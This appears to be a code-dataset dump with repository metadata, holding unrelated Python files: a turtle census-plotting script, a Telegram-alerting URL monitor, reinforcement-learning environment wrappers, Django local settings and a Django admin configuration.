def __init__(self,name,population):
#setting up instance variables
self.name = name
self.population = population
#Finding which population was the highest for scaling, checks each population to see if it's bigger than the current highest population
self.highestPopulation = 0
for x in range(0,len(self.population)):
if(self.population[x]>self.highestPopulation):
self.highestPopulation = self.population[x]
#Sets equation of the line stuff to 0 so I can use "+=" later on
self.m = 0
self.b = 0
#Setting up the County vs State specific things, ex. color and placement of title
self.color = "red"
self.extraDist = 0
#Finds the equation for the line just so i don't have to later
self.findEq()
def findEq(self):
#Finds the equation by using the equation given. Uses a for loop so the code isn't as long
for x in range(0,6):
self.m += float(self.population[x])*(-1/7+x*2/35)
self.b += float(self.population[x])*(11/21-x*3/21)
#Rounds the equation to 4 Decimal Places to meet requirements
self.m = round(self.m,4)
self.b = round(self.b,4)
def __lt__(self,rhand):
#Just if the m of the right one is more than the left side, return true.
if(self.m<rhand.m):
return True
else:
return False
def display(self,y_max=200):
#Sets the x xcalar for later use (not really needed)
xscalar = 110
#Sets the scaling for the Y axis so the graph is spaced relative to the high population, rather than being a set scaling
self.yscalar = (y_max+300)/self.highestPopulation
#Basically just finds the highest population and rounds it to 1 sig fig so it can display the spacing increments on the graph.
#If the turtle is at the origin (so bassically if this is the first time the turtle has run) set up the graph
if(turtle.xcor() == 0 and turtle.ycor() == 0):
#Setting up turtle settings
turtle.color("black")
turtle.hideturtle()
turtle.speed(0)
#Drwa the y axis
turtle.penup()
turtle.goto(-300,-300)
turtle.pendown()
turtle.goto(-300,y_max)
#Draw the X axis
turtle.penup()
turtle.goto(250,-300)
turtle.pendown()
turtle.goto(-300,-300)
turtle.penup()
#Write titles for the Axes
turtle.goto(-450,0)
turtle.write("Population (people)")
turtle.goto(0,-350)
turtle.write("Date (years)")
#Draw each increment on the X axis
for x in range(1,6):
turtle.penup()
turtle.goto(-310+xscalar*x,-320)
turtle.write("201{}".format(x))
turtle.goto(-300+xscalar*x,-300)
turtle.pendown()
turtle.goto(-300+xscalar*x,-285)
#Draw each increment on the Y axis
for x in range(1,5):
turtle.penup()
turtle.goto(-300,-300+(300+y_max)/4*x)
turtle.pendown()
turtle.goto(turtle.xcor()+20,turtle.ycor())
turtle.penup()
turtle.goto(turtle.xcor()-70,turtle.ycor()-10)
turtle.write(self.highestPopulation/4*x)
#Change the color based on what it initialized as
turtle.color(self.color)
turtle.penup()
for x in range(0,6):
#Draww all 6 points, moving over 110 every time, and placing the y Axis spot relative to the Y scalar (so highest is on top)
turtle.goto(x*xscalar-300,self.population[x]*self.yscalar-300)
turtle.dot(6,self.color)
#Draw the Line Based on the equation
turtle.goto(-300,self.b*self.yscalar-300)
turtle.pendown()
turtle.goto(250,(self.b+5*self.m)*self.yscalar-300)
turtle.penup()
#Actually displays the Equation
turtle.goto(turtle.xcor()+10,turtle.ycor())
turtle.write("y={0}x+{1}".format(float(self.m),float(self.b)))
#Displays the name either at the set height or a bit above it so the state and county doesn't overlap
turtle.goto(-300,240+20*self.extraDist)
turtle.write(self.name)
def getName(self):
#just makes it so the name can be obtained in other classes (this was written before I realized you could just do Object.variablename)
return self.name
class State(County):
def __init__(self,name,population,counties):
#Initialize it with the county initialization (to not copy paste code basically)
County.__init__(self,name,population)
self.counties = counties
#Overwrite the State/County specific variables to make it clear it's a state
self.color = "blue"
self.extraDist = 1
def display(self):
#Displays the State but with a specific y_max
County.display(self,200)
def greatestCounty(self):
#Used for analysis, basically finds the largest county then returns it
self.largestCounty = self.counties[0]
for x in range(0,len(self.counties)):
if(self.counties[x]>self.largestCounty):
self.largestCounty = self.counties[x]
return self.largestCounty
def leastCounty(self):
#Used for analysis, basically finds the Smallest county then returns it
self.lowestCounty = self.counties[0]
for x in range(0,len(self.counties)):
if(self.counties[x]>self.lowestCounty):
self.lowestCounty = self.counties[x]
return self.lowestCounty
class Analysis:
def __init__(self,state_list):
#Sets up instance variables
self.state_list = state_list
def displayState(self,name):
#Finds the state object based on the name, then displays it
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
self.state_list[x].display()
def displayStateGreatestCounty(self,name):
#Finds the state object based on the name
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
state = self.state_list[x]
#Displays the state
state.display()
#Based on the y_scalar, it finds what to say as y_max so both the state and county are scaled the same
y_max = float(state.yscalar)*float(state.greatestCounty().highestPopulation)-300
#Finds the largest county then displays it with the y_max
state.greatestCounty().display(y_max)
def displayStateLeastCounty(self,name):
#Finds the state object based on the name
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
state = self.state_list[x]
#Displays the state
state.display()
#Based on the y_scalar, it finds what to say as y_max so both the state and county are scaled the same
y_max = float(state.yscalar)*float(state.leastCounty().highestPopulation)-300
#Finds the smallest county then displays it with the y_max
state.leastCounty().display(y_max)
def clear(self):
#Sets up the desired clear function
turtle.reset()
def greatestState(self):
#Finds the Greatest state, then returns its name
self.greatest_state = self.state_list[0]
for x in range(0,len(self.state_list)):
if(self.state_list[x]>self.greatest_state):
self.greatest_state = self.state_list[x]
print(self.greatest_state.getName())
def leastState(self):
#Finds the loweest state, then returns its name
self.least_state = self.state_list[0]
for x in range(0,len(self.state_list)):
if(self.state_list[x]<self.least_state):
self.least_state = self.state_list[x]
print(self.least_state.getName())
#Opens the CSV
censusdataobj = open("censusdata.csv",'r')
#Discards the first line (no actual data)
censusdataobj.readline()
#Sets the 2nd line to the data
data = censusdataobj.readline()
#So that it doesn't cause an error the first time (could use try catch I guess, but no real need)
begin = True
#Empty state list so I can append to it
stateList = []
#Does this while there is data to read
while not(data == ""):
#Makes a list of all the data because CSV splits it by periods
data = data.split(",")
#If it's a state (or not a county)
if not("County" in data[0]):
#If it's not the loop, create a state variable in stateList
if not(begin):
stateList.append(State(currentState,statePopulation,countyList))
else:
#if it is the first loop, set begin o false
begin = False
#Set the current state name, and then find the population of the state in all 6 spots
currentState = data[0]
statePopulation = []
for x in range(1,7):
statePopulation.append(int(data[x]))
#sets the countyList to empty so I can append to it
countyList = []
else:
#Find the Name
countyName = data[0]
#prepare to find the population of each year
countyPopulation = []
for x in range(1,7):
countyPopulation.append(int(data[x]))
#make a new county in the countylist, to be added to the state variable once the next one comes
countyList.append(County(countyName,countyPopulation))
#read the next line (strategically at the end so if it's "", it doesn't error out or anything)
data = censusdataobj.readline()
#Close the File
censusdataobj.close()
#setting up analysis object
analysis = Analysis(stateList)
#put testing code here, before turtle.done() so it doesn't close the window immediately
turtle.done()
|
[
"eriklindeman12@gmail.com"
] |
eriklindeman12@gmail.com
|
2170705885ec02edbec127709a97f58b54329cc5
|
dba6e34fa96ca6ea478a9f877b26ab0da4c72b94
|
/main.py
|
7bd96bbd7b1ec79c0b156ba4f655ddf2141469b7
|
[] |
no_license
|
acekun141/getreq
|
7a5bd0dfc7701c275ea2f8da0ee238cbed2c1264
|
bd8635bce2181bf767232198914d532a262dde35
|
refs/heads/master
| 2020-06-16T14:19:02.155166
| 2019-07-10T14:20:29
| 2019-07-10T14:20:29
| 195,606,119
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
import requests
import time
import json
import bot
from bot import telegram_bot
with open('config.json') as config_file:
data = json.load(config_file)
list_urls = [
{
'link':'http://127.0.0.1:8000/Page1',
'name':'Page1'
},
{
'link':'http://127.0.0.1:8000',
'name':'HomePage'
}
]
def start():
print("Running...")
new_bot = telegram_bot(data['bot_token'],data['bot_chatID'])
# offset = new_bot.get_update()[-1]['update_id']
while True:
# list_data_bot = new_bot.get_update_with_offset(offset)
# if len(list_data_bot) > 1:
# offset += 1
# list_data_bot = new_bot.get_update_with_offset(offset)
# for data_bot in list_data_bot:
# if data_bot['message']['chat']['id'] == new_bot.groupID:
# offset = data_bot['update_id']
# if new_bot.check_message(data_bot['message']['text']):
# if data_bot['message']['text'][5:] == 'show':
# for i in range(len(list_urls)):
# msg = '{}. Link: {} - Name: {}'.format(i+1,list_urls[i]['link'],list_urls[i]['name'])
# new_bot.send_message(msg)
for url in list_urls:
try:
req = requests.get(url['link'])
if req.status_code != 200:
new_bot.send_message('Warning: Status code of {} is {}'.format(url['name'],req.status_code))
pass
except Exception as value:
new_bot.send_message('Exception: {}'.format(value))
pass
time.sleep(10)
if __name__ == "__main__":
try:
start()
except Exception as value:
print(value)
|
[
"acekun141@gmail.com"
] |
acekun141@gmail.com
|
c07eaaf18f9a7002308b7ea958242eb11f4115bc
|
b1d7310f3b9199b582251b2b2de72593e27c5e02
|
/env_utils.py
|
c1c645398addccf10f2bb56ffade6b38fd659bab
|
[
"MIT"
] |
permissive
|
Louiealbp/ContrastiveLearningGoalReaching
|
c753081e4ab8c886b87a8498a0d84bc676db6ea1
|
4ef3e22cb8276a8c2f4f313e2b27138b9cd361b3
|
refs/heads/main
| 2023-07-23T05:18:48.126964
| 2021-09-03T21:49:31
| 2021-09-03T21:49:31
| 402,890,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,705
|
py
|
import numpy as np
import gym
import os, sys
from arguments import get_args
from mpi4py import MPI
from rl_modules.ddpg_agent import ddpg_agent
import random
import torch
import dmc2gym
from collections import deque
def get_state(env):
    """Return the low-dimensional ground-truth state used for success checks.

    Reads geom positions straight from the dm_control physics engine.  The
    layout of the returned vector is task specific:

    * reacher:    [finger_x, finger_y, arm_x, arm_y]
    * point_mass: [x, y]

    Raises:
        NotImplementedError: for any other environment.  The original
            FetchReach branch fetched ``env.sim.get_state()`` but never set
            ``toret``, so ``return np.array(toret)`` crashed with an
            UnboundLocalError; failing loudly is clearer.
    """
    name = env.unwrapped.spec.id[:10]
    if name == 'dmc_reache':
        finger = env.physics.named.data.geom_xpos['finger', :2]
        arm = env.physics.named.data.geom_xpos['arm', :2]
        toret = [finger[0], finger[1], arm[0], arm[1]]
    elif name == 'dmc_point_':
        pos = env.physics.named.data.geom_xpos['pointmass', :2]
        toret = [pos[0], pos[1]]
    else:
        raise NotImplementedError(
            'get_state: no state extraction implemented for env {!r}'.format(name))
    return np.array(toret)
class FrameStack(gym.Wrapper):
    """Stack the ``k`` most recent observations along the leading axis."""

    def __init__(self, env, k):
        gym.Wrapper.__init__(self, env)
        self._k = k
        self._frames = deque([], maxlen=k)
        base_shape = env.observation_space.shape
        # Stacked space: leading dimension grows by a factor of k.
        self.observation_space = gym.spaces.Box(
            low=0,
            high=1,
            shape=((base_shape[0] * k,) + base_shape[1:]),
            dtype=env.observation_space.dtype
        )
        self._max_episode_steps = env._max_episode_steps

    def reset(self):
        # Seed the buffer by repeating the first frame k times.
        first_frame = self.env.reset()
        for _ in range(self._k):
            self._frames.append(first_frame)
        return self._get_obs()

    def step(self, action):
        frame, reward, done, info = self.env.step(action)
        self._frames.append(frame)
        return self._get_obs(), reward, done, info

    def _get_obs(self):
        assert len(self._frames) == self._k
        return np.concatenate(list(self._frames), axis=0)
class GoalBasedPixelObservationsDMControl(gym.Wrapper):
    """Goal-conditioned wrapper for dm_control envs (single frames).

    On reset, a goal is sampled by resetting the env once and recording the
    resulting observation and ground-truth state; the episode then starts
    from a second reset.  Observations are HER-style dicts carrying both
    pixel and state variants of observation/achieved_goal/desired_goal.
    ``is_success`` is the L2 distance between achieved and desired *states*
    falling below 0.03.
    """

    def __init__(self, env, state_based):
        gym.Wrapper.__init__(self, env)
        self.env = env  # maybe unnecessary? gym.Wrapper already stores it
        self.desired_goal = None
        self.desired_goal_state = None
        self._max_episode_steps = env._max_episode_steps
        # When True, the observation/goal slots carry states instead of pixels.
        self.state_based = state_based

    def _pack_obs(self, obs, obs_state):
        """Build (and cache in ``self.last_obs``) the goal-env dict for one frame.

        The achieved goal is always the current frame itself, so the
        previously duplicated reset/step dict construction lives here once.
        """
        if not self.state_based:
            self.last_obs = {
                'observation': obs.copy(),
                'achieved_goal': obs.copy(),
                'desired_goal': self.desired_goal.copy(),
                'observation_state': obs_state.copy(),
                'achieved_goal_state': obs_state.copy(),
                'desired_goal_state': self.desired_goal_state.copy()
            }
        else:
            self.last_obs = {
                'observation': obs_state.copy(),
                'achieved_goal': obs_state.copy(),
                'desired_goal': self.desired_goal_state.copy(),
                'observation_state': obs_state.copy(),
                'achieved_goal_state': obs_state.copy(),
                'desired_goal_state': self.desired_goal_state.copy()
            }
        return self.last_obs

    def reset(self):
        # First reset samples the goal; second reset starts the episode.
        self.desired_goal = self.env.reset()
        self.desired_goal_state = get_state(self.env)
        obs = self.env.reset()
        obs_state = get_state(self.env)
        return self._pack_obs(obs, obs_state)

    def step(self, action):
        obs, reward, done, info = self.env.step(action)
        obs_state = get_state(self.env)
        # Success = achieved state within 0.03 (L2) of the goal state.
        info['is_success'] = np.sqrt(((obs_state - self.desired_goal_state) ** 2).sum()) < 0.03
        return self._pack_obs(obs, obs_state), reward, done, info
class GoalBasedPixelObservationsOpenAIGym(gym.Wrapper):
    """Goal-conditioned wrapper for OpenAI Gym robotics envs (FetchReach).

    Goals are sampled from a pre-rendered dataset of (state, image) pairs;
    observations are rendered off-screen at 100x100 from camera 3 and
    returned as HER-style dicts with both pixel and state variants.
    """

    # Rendering geometry shared by goal images and live observations.
    _IMG_SIZE = 100
    _CAMERA_ID = 3

    def __init__(self, env, state_based):
        gym.Wrapper.__init__(self, env)
        self.env = env  # maybe unnecessary? gym.Wrapper already stores it
        self.desired_goal = None
        self.desired_goal_state = None
        self._max_episode_steps = env._max_episode_steps
        self.state_based = state_based
        name = env.unwrapped.spec.id[:10]
        if name == 'FetchReach':
            # NOTE(review): hard-coded absolute path — should come from
            # configuration; this only works on the original author's machine.
            payload = torch.load('/home/aaron_putterman/project1/hindsight-experience-replay-master/fetchreachgoals/goals3.pt')
            self.states = payload[0]      # 1000 x 10
            self.renderings = payload[1]  # 1000 x 100 x 100 x 3

    def _render_obs(self):
        """Off-screen render of the current frame, returned as CHW (3, H, W)."""
        viewer = self.env.env._get_viewer(mode='rgb_array')
        viewer.render(width=self._IMG_SIZE, height=self._IMG_SIZE,
                      camera_id=self._CAMERA_ID)
        pixels = viewer.read_pixels(width=self._IMG_SIZE, height=self._IMG_SIZE,
                                    depth=False)
        obs = pixels[::-1, :, :]       # mujoco renders the image upside-down
        return np.moveaxis(obs, 2, 0)  # HWC -> CHW (same as two swapaxes calls)

    def _pack_obs(self, obs, obs_state):
        """Build (and cache in ``self.last_obs``) the goal-env dict for one frame."""
        if not self.state_based:
            self.last_obs = {
                'observation': obs.copy(),
                'achieved_goal': obs.copy(),
                'desired_goal': self.desired_goal.copy(),
                'observation_state': obs_state.copy(),
                'achieved_goal_state': obs_state.copy(),
                'desired_goal_state': self.desired_goal_state.copy()
            }
        else:
            self.last_obs = {
                'observation': obs_state.copy(),
                'achieved_goal': obs_state.copy(),
                'desired_goal': self.desired_goal_state.copy(),
                'observation_state': obs_state.copy(),
                'achieved_goal_state': obs_state.copy(),
                'desired_goal_state': self.desired_goal_state.copy()
            }
        return self.last_obs

    def reset(self):
        # Sample a goal (image + ground-truth state) from the dataset.
        idx = np.random.randint(0, self.renderings.shape[0])
        goal_img = self.renderings[idx].numpy()
        self.desired_goal = np.moveaxis(goal_img, 2, 0)  # HWC -> CHW
        self.desired_goal_state = self.states[idx].numpy()
        obs_state = self.env.reset()['observation']
        obs = self._render_obs()
        return self._pack_obs(obs, obs_state)

    def step(self, action):
        obs_state, reward, done, info = self.env.step(action)
        obs_state = obs_state['observation']
        obs = self._render_obs()
        # Success = achieved state within 0.03 (L2) of the goal state.
        info['is_success'] = np.sqrt(((obs_state - self.desired_goal_state) ** 2).sum()) < 0.03
        return self._pack_obs(obs, obs_state), reward, done, info
def get_env_params(env, args):
    """Summarize an env's observation/goal/action dimensions for the agent.

    ``args`` is accepted for interface compatibility but not used here.
    Resets the environment once to obtain a sample observation dict.
    """
    sample = env.reset()
    space = env.action_space
    return {
        'obs': sample['observation'].shape,
        'goal': sample['desired_goal'].shape,
        'action': space.shape[0],
        'action_max': space.high[0],
        'max_timesteps': env._max_episode_steps,
    }
def create_env(args):
    """Create and wrap the environment named by ``args.env_name``.

    dm_control tasks ('reacher', 'point_mass') are built via dmc2gym on the
    'easy' task, frame-stacked, and wrapped into the goal-conditioned
    interface; 'FetchReach-v1' is built via gym.  State-based wrapping is
    selected whenever the encoder type is not 'pixel'.

    Raises:
        NotImplementedError: for any other env name.  (The original printed
            a message and implicitly returned None, which crashed callers
            later with an opaque AttributeError.)
    """
    if args.env_name == 'reacher' or args.env_name == 'point_mass':
        env = dmc2gym.make(
            domain_name=args.env_name,
            task_name='easy',
            seed=args.seed,
            visualize_reward=False,
            from_pixels=(args.encoder_type == 'pixel'),
            height=args.pre_transform_image_size,
            width=args.pre_transform_image_size,
            frame_skip=args.action_repeat,
        )
        env = FrameStack(env, k=args.frame_stack)
        env = GoalBasedPixelObservationsDMControl(env, args.encoder_type != 'pixel')
        return env
    elif args.env_name == 'FetchReach-v1':
        env = gym.make(args.env_name)
        return GoalBasedPixelObservationsOpenAIGym(env, args.encoder_type != 'pixel')
    else:
        raise NotImplementedError(
            'create_env: unsupported env_name {!r}'.format(args.env_name))
|
[
"noreply@github.com"
] |
noreply@github.com
|
fbf6bf8a92fdbb61a7f72ca93c5ac06aaadfbe41
|
997c24e536f27d3871c293d1f14abc2410e1ae39
|
/config/settings/local.py
|
f67a181d9a2eccb02377cb2f7fe5a2731c62e63c
|
[
"MIT"
] |
permissive
|
arsenalstriker14/imagetraccloud
|
4b195e407cfd7dec41115c8cf5cb931dcc35cbd0
|
04004d5eabc82e85596bc9e110c9250d5f882e17
|
refs/heads/master
| 2021-01-11T16:58:48.619218
| 2017-02-02T22:18:31
| 2017-02-02T22:18:31
| 79,710,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,263
|
py
|
# -*- coding: utf-8 -*-
"""
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
import os
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Debug defaults to on for local development; override with DJANGO_DEBUG=false.
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# Accept requests from any host while developing locally.
ALLOWED_HOSTS = ['*']
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='%gkt&m8bzba^lvdhdxxhr5#zn%(ggv)477o_y5sa!k_+9nqa#9')
# Mail settings
# ------------------------------------------------------------------------------
# Outgoing mail is captured by a local debugging SMTP server, or falls back
# to the console backend so messages appear in the runserver output.
EMAIL_PORT = 1025
EMAIL_HOST = 'localhost'
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
                    default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
# Per-process in-memory cache; nothing is shared between processes.
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': ''
    }
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
# The toolbar is only shown to clients whose IP is in INTERNAL_IPS.
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# tricks to have debug toolbar when developing with docker
if os.environ.get('USE_DOCKER') == 'yes':
    # Derive the docker bridge gateway address (container IP with the last
    # octet replaced by 1) so requests from the host trigger the toolbar.
    ip = socket.gethostbyname(socket.gethostname())
    INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
    'DISABLE_PANELS': [
        'debug_toolbar.panels.redirects.RedirectsPanel',
    ],
    'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
# ------------------------------------------------------------------------------
|
[
"accounts@chukesinteractive.com"
] |
accounts@chukesinteractive.com
|
ca5197c4632cb5c88a4dbc9e707acb06e8f609c7
|
406b08dac8f90b855309be77c3ad3a7926aaa02e
|
/iron2/admin.py
|
5cb81a061b1b344c54a53bd1209b388c353df3a6
|
[] |
no_license
|
DragonovAk47/SocialQuery1
|
46cdb51dc137cc9f739f2f778bcf2bdaf6cff8dd
|
2d20bc48f04f1bdbcc3eddfe57a1bb1e9278cb21
|
refs/heads/master
| 2020-06-24T06:29:39.179380
| 2019-07-25T18:00:06
| 2019-07-25T18:00:06
| 198,880,431
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
from django.contrib import admin
from iron2.models import UserProfile
# Register your models here
# .
class UserProfileAdmin(admin.ModelAdmin):
    """Admin changelist configuration for UserProfile.

    Fixes the original ``search_list`` attribute: that is not a Django
    ModelAdmin option and was silently ignored, so the admin search box
    never appeared.  ``search_fields`` is the real option.
    """
    list_display = ('user', 'Website', 'Mobile', 'user_info')
    # Was ``search_list`` — not a ModelAdmin option; search never worked.
    search_fields = ('Mobile', 'description',)
    list_display_links = ('user_info',)
    list_editable = ('Website',)

    def user_info(self, obj):
        # Computed column for list_display: shows the profile description.
        return obj.description

    def get_queryset(self, request):
        # Order the changelist by mobile number.
        queryset = super(UserProfileAdmin, self).get_queryset(request)
        return queryset.order_by('Mobile')


admin.site.register(UserProfile, UserProfileAdmin)
|
[
"35777944+DragonovAk47@users.noreply.github.com"
] |
35777944+DragonovAk47@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.